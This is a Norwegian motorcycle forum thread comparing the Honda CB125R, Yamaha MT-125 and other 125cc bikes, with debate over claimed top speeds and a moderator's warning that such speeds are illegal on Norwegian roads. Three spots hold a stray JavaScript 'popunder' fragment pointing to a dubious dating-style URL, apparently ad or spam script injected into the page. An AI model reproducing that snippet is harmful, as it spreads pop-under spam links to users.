Honda CB125R

Prat, råd og tips for dere med lett-MC, crossere o.l.
Benni125
Innlegg: 9
Registrert: 23 okt 2019, 09:29
Motorsykkelen din: Yamaha MT-125 2020

Honda CB125R

Legg inn av Benni125 »

Har sett på noen lett sykler, og lurer på om honda cb125r er en bra sykkel? Er det noen som eier den eller har kjørt den? Vil ha en naked sykkel som ser bra ut og går bra.

Brukeravatar
AJ
Administrator
Innlegg: 37830
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Honda CB125R

Legg inn av AJ »

Benni125 skrev: 11 des 2019, 00:51 Har sett på noen lett sykler, og lurer på om honda cb125r er en bra sykkel? Er det noen som eier den eller har kjørt den? Vil ha en naked sykkel som ser bra ut og går bra.
Fin sykkel på mange måter, men med for svak motor, var mitt inntrykk etter testturen tidligere i år:
Honda CB125R side1.pdf
Honda CB125R side2.pdf
Testsak over to sider.

NB! skrivefeil i tittelen. Skal selvfølgelig være CB og ikke CD...
Om det er min eller deskens feil vites ikke, men slikt skal naturligvis ikke forekomme. Men det skjer dessverre fra tid til annen... :redface .
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

mekkern
Innlegg: 7569
Registrert: 06 nov 2008, 22:42
Motorsykkelen din: flere -til div kjøring.
Sted: Tranby

Re: Honda CB125R

Legg inn av mekkern »

CBR125 funker helt ok i vertfall og er vel samme motor..

Jeg møtte forøvrig denne karen i tyskland i fjor:
https://www.facebook.com/sander.trelvik ... LPYGLRyh2N

Han hadde en 500mils ferietur i europa på sin cbr125ccm.. :twothumbs:
当有疑问时踢你的敌人在生殖器上,你可以道歉后

Brukeravatar
kjellv
Moderator
Innlegg: 6952
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Honda CB125R

Legg inn av kjellv »

2020_yam_mt125_eu_dpbmc_stu_001_03-71694.jpg
Har du sett på 2020 Yamaha MT-125? Denne har fått samme motor som YZF-R125. Denne motoren har variable kammer som endrer åpning av ventiler ved 5700 rpm, og gjør at den har mer Power både på lave og i høye turtall en tidligere motorer. Se på filmen under, bruker ikke lang tid fra 0-140 denne. I tillegg til dette er jo nye MT-125 blitt enda mye tøffere enn første generasjon. Fronten ligner mer på MT-09, 140/70R17 bakdekk, baksetet er bedre , og for første gang faktisk noe du kan tilby en passasjer å sitte på uten å ha vondt i baken i lang tid etterpå :thumleft

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.

JK95
Innlegg: 1081
Registrert: 29 okt 2011, 16:48
Motorsykkelen din: Ducati Streetfighter 1098
Sted: Trondheim

Re: Honda CB125R

Legg inn av JK95 »

Det store spørsmålet er vel hva du egentlig er ute etter? Utseende er noe du selv må bestemme om er pent, utover det er ingen av 125cc firtakterene "spreke", men de er egentlig nok for 16-åringer. Har vært der selv, med en av de større og tyngre lettsyklene, Hyosung GT125. Pen sykkel i mine øyne, fysisk stor nok til å forveksles med større sykler og kvaliteten var upåklagelig. Motor er lisensprodusert på Suzuki-design, og holder mål :thumleft

Skal du ha noe som virkelig går godt så har du to alternativer, totakt eller EL. Aprilia, Cagiva og KTM er vel de mest kjente, men KTM har kun motard i 125cc totakt, alternativet er Duke 125 som er firtakt. Aprilia har Tuono og Cagiva har Raptor, sistnevnte hadde jeg meget lyst på selv. Det ble ikke slikt da jeg ikke kunne skru på den tiden. Skal du ha totakt må du enten kunne skru eller være villig til å lære det, da ender du med noe av det sprekeste innen 125cc.

EL er jo et nytt alternativ. https://www.finn.no/mc/all/ad.html?finnkode=163852986
Hvordan de har fått til at noe med slik effekt går under A1 vet jeg ikke, men der har du et fint smutthull inn i brutale krefter jeg ikke vil anbefale for en 16-åring :[-X Har du dog kapital og lyst, samt ikke trenger ubegrenset kjørelengde er det et kult og annerledes alternativ.

Brukeravatar
Bjerknez
Innlegg: 22848
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Honda CB125R

Legg inn av Bjerknez »

kjellv skrev: 11 des 2019, 18:49 2020_yam_mt125_eu_dpbmc_stu_001_03-71694.jpg
Har du sett på 2020 Yamaha MT-125? Denne har fått samme motor som YZF-R125. Denne motoren har variable kammer som endrer åpning av ventiler ved 5700 rpm, og gjør at den har mer Power både på lave og i høye turtall en tidligere motorer. Se på filmen under, bruker ikke lang tid fra 0-140 denne. I tillegg til dette er jo nye MT-125 blitt enda mye tøffere enn første generasjon. Fronten ligner mer på MT-09, 140/70R17 bakdekk, baksetet er bedre , og for første gang faktisk noe du kan tilby en passasjer å sitte på uten å ha vondt i baken i lang tid etterpå :thumleft

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Alt er relativt, men jeg kom til 45 sekunder når nåla bikket 140. 0-100km/t gikk unna på rundt 15 sekunder. Om det er imponerende eller ikke vet jeg ikke og jeg sier ikke at noen andre 125ccm er bedre eller raskere heller...

Når det er sagt så er jeg ellers enig med deg. Skulle jeg hatt en 125ccm. så ville jeg nok valgt MT'en ja. Er vel en typisk sykkel som ungdomman lika dette :thumleft

Brukeravatar
Rune75
Innlegg: 1041
Registrert: 17 jun 2013, 09:29
Motorsykkelen din: Din MC her

Re: Honda CB125R

Legg inn av Rune75 »

Bjerknez skrev: 12 des 2019, 11:12
kjellv skrev: 11 des 2019, 18:49 2020_yam_mt125_eu_dpbmc_stu_001_03-71694.jpg
Har du sett på 2020 Yamaha MT-125? Denne har fått samme motor som YZF-R125. Denne motoren har variable kammer som endrer åpning av ventiler ved 5700 rpm, og gjør at den har mer Power både på lave og i høye turtall en tidligere motorer. Se på filmen under, bruker ikke lang tid fra 0-140 denne. I tillegg til dette er jo nye MT-125 blitt enda mye tøffere enn første generasjon. Fronten ligner mer på MT-09, 140/70R17 bakdekk, baksetet er bedre , og for første gang faktisk noe du kan tilby en passasjer å sitte på uten å ha vondt i baken i lang tid etterpå :thumleft

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Alt er relativt, men jeg kom til 45 sekunder når nåla bikket 140. 0-100km/t gikk unna på rundt 15 sekunder. Om det er imponerende eller ikke vet jeg ikke og jeg sier ikke at noen andre 125ccm er bedre eller raskere heller...

Når det er sagt så er jeg ellers enig med deg. Skulle jeg hatt en 125ccm. så ville jeg nok valgt MT'en ja. Er vel en typisk sykkel som ungdomman lika dette :thumleft


140 km/t med 15 hk - tviler. Er nok nedoverbakke i den filmen der.

Brukeravatar
kjellv
Moderator
Innlegg: 6952
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Honda CB125R

Legg inn av kjellv »

Det ligger flere slike filmsnutter på Youtube her https://www.youtube.com/results?search_ ... +top+speed. Dette er selvfølgelig filmer som er lagt inn privat, ikke vitenskapelige kvalitetssikrede tester. Men ha i bakhodet at det må skilles mellom 2019 modellen som har den nye motoren, og tidligere modeller som hadde turtallsperra tilsvarende ca 130 km/t. Pass på at det er dette instrumentet du ser på, det er også nytt fra 2019.
Men joda @Rune75, 2019 og 2020 YZF-R125 klarer 140. Om noen av konkurrentene gjør det vet jeg ikke. MT-125 har samme motor, drivverk, hjul og bremser.

For all del.. toppfart 140 km/t er ikke tillatt på noen Norske veier. En 16 åring som kjøper denne pga toppfarten kan fort havne i et økonomisk uføre, uten førerkort og med fengselsstraff om han vil prøve ut dette. Så er det nevnt!

Mer om MT-125 her https://www.yamaha-motor.eu/no/nb/produ ... -125-2020/

Brukeravatar
AJ
Administrator
Innlegg: 37830
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Honda CB125R

Legg inn av AJ »

Tviler sterkt på at Honda CB125R greier 140 km/t.
Dert må i så fall være med god vindstyrke i ryggen og hjemlengsel til Grandispizzaen eller kjøttkakene til a mor, alt etter hva man foretrekker... :crazy:
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

mekkern
Innlegg: 7569
Registrert: 06 nov 2008, 22:42
Motorsykkelen din: flere -til div kjøring.
Sted: Tranby

Re: Honda CB125R

Legg inn av mekkern »

En skal ha rimelig god aerodynamikk for å tippe 140 reellt med 15hk...
når en ikke greier mer enn rundt 160 med 40-45...på en naken sykkel..
当有疑问时踢你的敌人在生殖器上,你可以道歉后

Brukeravatar
kjellv
Moderator
Innlegg: 6952
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Honda CB125R

Legg inn av kjellv »

mekkern skrev: 12 des 2019, 21:09 En skal ha rimelig god aerodynamikk for å tippe 140 reellt med 15hk...
når en ikke greier mer enn rundt 160 med 40-45...på en naken sykkel..
Det tror jeg du har helt rett i. Det er nok stor forskjell på en YZF-R125 og en MT-125, selv om det meste på disse to er likt. De siste km/t krever mye.

Brukeravatar
Rune75
Innlegg: 1041
Registrert: 17 jun 2013, 09:29
Motorsykkelen din: Din MC her

Re: Honda CB125R

Legg inn av Rune75 »

Bilde

Brukeravatar
Longines
Innlegg: 26
Registrert: 14 feb 2016, 21:45
Motorsykkelen din: Vespa LXV 50/ Suzuki ZR50

Re: Honda CB125R

Legg inn av Longines »

CB125R har 13hk, mens MT 125 har 14.8. Samtidig er CB ca 14 kg lettere.
CB125RvsDUkeVSMT125.PNG
( Fra Bennetts.co.uk)

CB125R har 0.103 hk/kg
MT 125 har 0.107 hk/kg

Har ikke kjørt noen av disse, men forstår at forskjellen er merkbar. Både Honda, Yamaha og KTM lager gode 125cc, så det er vel mer ned til preferanser. Personlig foretrekker jeg looken på CB125R, fremfor den mer futuristiske MT125-looken. Kan naturligvis håpe at Honda vil komme med full 15hk.. så har de en vinner.

Dessverre lager ingen, av de store merkene, cruiser eller retro-look lettsykler lenger. Alle har masse luft mellom bakhjul og bakskjerm, og en stygg plastskjerm som stikker rett ut bak. :-(
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.

Brukeravatar
Bjerknez
Innlegg: 22848
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Honda CB125R

Legg inn av Bjerknez »

Man ligger vel uansett ikke å tyner toppfart med en lettsykkel. Jeg vil tro kjøreglede er det viktigste, og om sykkern har 1.2 eller 1.1 HK'er pr. kilo er klinkende likegyldig spør du meg.

Liker man en sykkel som har litt "bunndrag" og føles mer morsom til vanlig kjøring ville jeg nok ikke valgt en 4-sylindret tror jeg. Jeg holder en ganske klar knapp på Yamahaen i det segmenter her.

MEN.... så er jo også utseende på sykkelen viktig med tanke på kjøreglede. Man skal faktisk like sykkelen man kjører da dette gir en glede i seg selv. Her er smaken som baken.

Når det gjelder motor er det uansett ingen 125ccm som drar skinnet av pølsa, så jeg hadde holdt en knapp på den sykkelen som ga meg mest glede. Rett og slett fulgt magefølelsen. Hva andre mener er uansett ikke veldig viktig. :)

mekkern
Innlegg: 7569
Registrert: 06 nov 2008, 22:42
Motorsykkelen din: flere -til div kjøring.
Sted: Tranby

Re: Honda CB125R

Legg inn av mekkern »

Bjerknez skrev: 19 des 2019, 13:16
Liker man en sykkel som har litt "bunndrag" og føles mer morsom til vanlig kjøring ville jeg nok ikke valgt en 4-sylindret tror jeg. Jeg holder en ganske klar knapp på Yamahaen i det segmenter her.
Nå har vel ikke noen av dagens produsenter noen 4 sylindrede 125ccm... :roll
men Honda har hatt en: https://www.motorcyclespecs.co.za/model ... rc_146.htm

men "bunndrag" på en 125ccm er heller ikke alltid samme som høyest effekt..

men skal man ta den HELT ut med 4takt så er dette en het kandidat-dog uten "bunndrag" men en toppfart på 220kmh er jo brukbart..
https://www.motorcyclespecs.co.za/model ... linder.htm

men om SVV godkjenner "lyddemperne" er vel en annen sak.. :lol
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
当有疑问时踢你的敌人在生殖器上,你可以道歉后

Svar